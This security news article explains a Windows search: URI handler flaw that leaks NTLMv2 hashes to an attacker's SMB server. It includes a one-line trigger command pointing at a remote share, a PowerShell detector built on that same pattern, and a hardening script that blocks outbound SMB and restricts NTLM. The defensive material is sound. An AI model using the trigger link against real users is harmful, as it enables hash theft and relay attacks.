Overview
Cybersecurity researchers at Huntress have uncovered an unpatched Windows vulnerability that exposes users’ NTLMv2 hashes through the search: URI handler, echoing the same flaw previously seen in CVE‑2026‑33829 affecting the Windows Snipping Tool.
This newly discovered issue allows attackers to steal authentication hashes simply by tricking victims into clicking a malicious link, enabling relay attacks and potential network compromise.

Vulnerability Mechanism
The flaw resides in the Windows Search URI handler, which fails to properly validate parameters passed via crafted URLs.
| Stage | Component | Impact |
|---|---|---|
| Malicious Link Click | User clicks crafted search URI | Initiates SMB connection to attacker’s server |
| NTLMv2 Leakage | crumb=location: parameter | Triggers NTLM authentication |
| Hash Capture | Attacker’s SMB server | Receives victim’s Net‑NTLMv2 hash |
| Relay Attack | Reuse of stolen hash | Enables lateral movement and impersonation |
The exploit can be triggered using a simple command:

```
start "" "search:query=test&crumb=location:\\10.0.1.100\share"
```
This mechanism mirrors the Snipping Tool’s ms‑screensketch: URI flaw, which was patched in April 2026.
Technical Insights
The vulnerability stems from improper validation of UNC paths within the search: URI handler, allowing outbound SMB connections to attacker‑controlled servers.
Researchers confirmed that the NTLMv2 hash leakage occurs under identical conditions to previous URI handler bugs, including CVE‑2023‑35636, in which the crumb parameter was likewise abused for credential theft.
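The Vulnerability Mechanism table and the Technical Insights paragraph both come down to one observable pattern: a search: URI whose crumb parameter carries a location: value that is a UNC path. The following PowerShell function is an added example for defenders (it is not Huntress code and does not reproduce the handler’s own parsing); it inspects URIs pulled from mail, proxy or EDR logs and flags that pattern. The sample URIs, the function name and the percent-decoding step are my assumptions.

```powershell
# Added example: flag search: URIs whose crumb parameter names a UNC location.
# This is a log-triage check, not the Windows handler's parser.

function Test-SearchUriForUncLocation {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$Uri
    )
    process {
        # Only the search: scheme is in scope; -match is case-insensitive.
        if ($Uri -match '^search:(.*)$') {
            $query = $Matches[1]
        } else {
            return [pscustomobject]@{ Uri = $Uri; Scheme = 'other'; Suspicious = $false; Location = $null }
        }

        # Collect every crumb= value; URLs in logs are often percent-encoded,
        # so decode before looking at the content.
        $crumbs = @()
        foreach ($pair in ($query -split '&')) {
            $name, $value = $pair -split '=', 2
            if ($name -ieq 'crumb' -and $value) {
                $crumbs += [System.Uri]::UnescapeDataString($value)
            }
        }

        # A UNC target looks like location:\\host\share (or location://host/share).
        # A local path such as location:C:\Users is not a remote SMB target.
        $unc = $null
        foreach ($c in $crumbs) {
            if ($c -match '^location:\s*(\\\\|//)([^\\/]+)') {
                $unc = $c
                break
            }
        }

        [pscustomobject]@{
            Uri        = $Uri
            Scheme     = 'search'
            Suspicious = [bool]$unc
            Location   = $unc
        }
    }
}

# Constructed sample inputs (the second is the command line shown in the article).
$samples = @(
    'search:query=report',
    'search:query=test&crumb=location:\\10.0.1.100\share',
    'search:query=test&crumb=location:C:\Users\public',
    'search:query=x&crumb=location%3A%5C%5Cfileserver.example%5Cshare'
)
$samples | Test-SearchUriForUncLocation | Format-Table -AutoSize
```

Of the four samples, only the second and fourth are reported as Suspicious; the third names a local path and is left alone. Pipe real URL fields into the function (for example, URLs extracted from mail-gateway or web-proxy logs) to surface clicks that would have caused an outbound SMB connection.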
According to Huntress researcher Andrew Schwartz,
“It used the same NTLM leakage mechanism, produced the same Net‑NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating.”
Despite responsible disclosure on April 15, 2026, Microsoft declined to patch the issue, stating that only Important and Critical severity cases meet their servicing threshold.
Mitigation Steps
Until Microsoft releases a fix, defenders should:
- Block outbound SMB traffic on hosts that don’t require it (TCP 445 and 139).
- Enforce SMB signing to prevent captured hashes from being relayed.
- Disable NTLM authentication across enterprise systems.
- Educate users to avoid clicking suspicious links embedded in emails or web pages.
These measures can significantly reduce exposure to hash relay attacks and credential impersonation.
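The first three mitigation steps above are host-level settings that can be applied and verified from PowerShell. The script below is an added example of doing so; it is not Microsoft or Huntress guidance verbatim. The firewall rule name, the function names and the choice to put NTLM restriction in audit mode first are my assumptions; run it elevated.

```powershell
# Added example: apply the outbound-SMB block, required SMB signing and the
# outgoing-NTLM restriction, then read the resulting state back.

$RuleName = 'Block outbound SMB (NTLM leak mitigation)'   # assumed name
$Msv1Key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

function Block-OutboundSmb {
    # Drop outbound TCP 445/139 to any remote host. Hosts that legitimately
    # reach file servers should scope this with -RemoteAddress instead.
    if (-not (Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $RuleName -Direction Outbound -Protocol TCP `
            -RemotePort 445, 139 -Action Block -Profile Any | Out-Null
    }
}

function Enable-SmbSigning {
    # Requiring signing on both sides means a captured Net-NTLMv2 exchange
    # cannot be relayed to, or from, this host.
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
}

function Set-OutgoingNtlmRestriction {
    # Policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote
    # servers": 1 = Audit all (log what would break), 2 = Deny all.
    param([ValidateSet(1, 2)][int]$Mode = 1)
    New-ItemProperty -Path $Msv1Key -Name 'RestrictSendingNTLMTraffic' `
        -PropertyType DWord -Value $Mode -Force | Out-Null
}

function Get-NtlmLeakMitigationState {
    $rule   = Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue
    $client = Get-SmbClientConfiguration
    $server = Get-SmbServerConfiguration
    $ntlm   = Get-ItemProperty -Path $Msv1Key -Name 'RestrictSendingNTLMTraffic' `
                  -ErrorAction SilentlyContinue

    $policy = 'Allow'
    switch ($ntlm.RestrictSendingNTLMTraffic) {
        1 { $policy = 'Audit' }
        2 { $policy = 'Deny' }
    }

    [pscustomobject]@{
        OutboundSmbBlocked    = [bool]($rule -and $rule.Enabled -eq 'True')
        ClientSigningRequired = $client.RequireSecuritySignature
        ServerSigningRequired = $server.RequireSecuritySignature
        OutgoingNtlmPolicy    = $policy
    }
}

Block-OutboundSmb
Enable-SmbSigning
Set-OutgoingNtlmRestriction -Mode 1
Get-NtlmLeakMitigationState
```

Start with audit mode (value 1) and review the NTLM audit events it produces before switching to Deny, since legacy applications that still depend on NTLM will stop authenticating; likewise, the firewall rule will break access to file shares on hosts that need them, so roll it out to workstations that do not.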
Expert in the Cloud Insight
The Windows Search URI vulnerability underscores how legacy protocols and URI handlers remain fertile ground for exploitation. A single unvalidated parameter can bridge the gap between local user interaction and network‑level credential theft.
For defenders, the takeaway is clear: disable unused protocols, monitor outbound traffic, and treat URI handlers as attack surfaces — not conveniences.